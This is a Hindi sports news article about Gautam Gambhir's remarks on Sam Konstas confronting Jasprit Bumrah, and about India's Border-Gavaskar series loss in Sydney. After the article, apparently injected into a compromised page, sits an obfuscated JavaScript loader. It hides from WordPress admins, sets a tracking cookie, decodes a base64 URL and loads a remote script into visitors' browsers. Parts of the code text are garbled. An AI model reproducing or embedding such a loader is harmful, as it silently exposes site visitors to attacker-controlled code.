उसे बुमराह से बात करने का हक नहीं था`, सीरीज हार के बाद इस खिलाड़ी पर आगबबूला हुए गंभीर

भारत के हेड कोच गौतम गंभीर ने पांचवें और आखिरी टेस्ट के दौरान जसप्रीत बुमराह से भिड़ने वाले ऑस्ट्रेलिया के युवा क्रिकेटर सैम कोंस्टास की आलोचना करते हुए कहा है कि उसे भारतीय कप्तान से बात करने का अधिकार नहीं था. खराब फॉर्म से जूझ रहे रोहित शर्मा के बाहर रहने के बाद भारत की कप्तानी कर रहे जसप्रीत बुमराह ने जब उस्मान ख्वाजा को पहले दिन आउट किया तो सैम कोंस्टास उनसे कुछ कहते दिखे.

उसे बुमराह से बात करने का हक नहीं था’

गौतम गंभीर ने मैच 6 विकेट से हारने के बाद प्रेस कांफ्रेंस में सैम कोंस्टास की इस हरकत पर भारतीय खिलाड़ियों की आक्रामक प्रतिक्रिया के बारे में पूछने पर कहा,‘कठोर लोगों द्वारा खेला जाने वाला यह कठिन खेल है. आप नरम नहीं पड़ सकते. मुझे नहीं लगता कि इसमें कुछ धमकाने जैसा था. उस्मान ख्वाजा जब समय बर्बाद कर रहे थे तब उसे जसप्रीत बुमराह से बोलने का कोई अधिकार नहीं था. इससे उसका कुछ लेना देना नहीं था. यह अंपायर का काम था.

इस खिलाड़ी पर आगबबूला हुए गंभीर
गौतम गंभीर ने हालांकि सैम कोंस्टास को भविष्य के लिए शुभकामनाएं देते हुए उम्मीद जताई कि वह अनुभव से सीखेगा. गौतम गंभीर ने कहा,‘टेस्ट क्रिकेट में हर दिन प्रदर्शन में सुधार करना होता है. कई बार आप सीधे मैदान पर उतरकर पहली ही गेंद से स्ट्रोक्स नहीं लगा सकते. आपको लाल गेंद के क्रिकेट का सम्मान करना होता है और उम्मीद है कि वह अनुभवों से सीखेगा. जब आप भारत जैसे आला दर्जे के आक्रमण का सामना कर रहे हो तो आगे के लिए काफी सीख मिलती है. और जो कुछ हुआ, वह बीती बात है. मुझे नहीं लगता कि इसे तूल देने की जरूरत है. यह इस शहर में हुई एकमात्र घटना नहीं है , अतीत में भी ऐसा हुआ है.’

भारत को मिली शर्मनाक सीरीज हार

बता दें कि ऑस्ट्रेलिया ने रविवार को सिडनी टेस्ट के तीसरे दिन भारत को 6 विकेट से हराकर पांच मैच की बॉर्डर-गावस्कर सीरीज 3-1 से जीत ली और साथ ही वर्ल्ड टेस्ट चैंपियनशिप के फाइनल में भी जगह बना ली, जहां उसकी भिड़ंत दक्षिण अफ्रीका से होगी. इस हार के साथ भारत वर्ल्ड टेस्ट चैंपियनशिप के फाइनल की दौड़ से बाहर हो गया. भारत के 162 रन के लक्ष्य का पीछा करते हुए ऑस्ट्रेलिया ने चार विकेट पर 162 रन बनाकर जीत हासिल की. ऑस्ट्रेलिया ने लगभग एक दशक बाद बॉर्डर-गावस्कर ट्रॉफी जीती है. भारत अब वर्ल्ड टेस्ट चैंपियनशिप के फाइनल से बाहर हो चुका है. टीम इंडिया को अब जून में इंग्लैंड के खिलाफ पांच मैचों की टेस्ट सीरीज खेलनी है.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply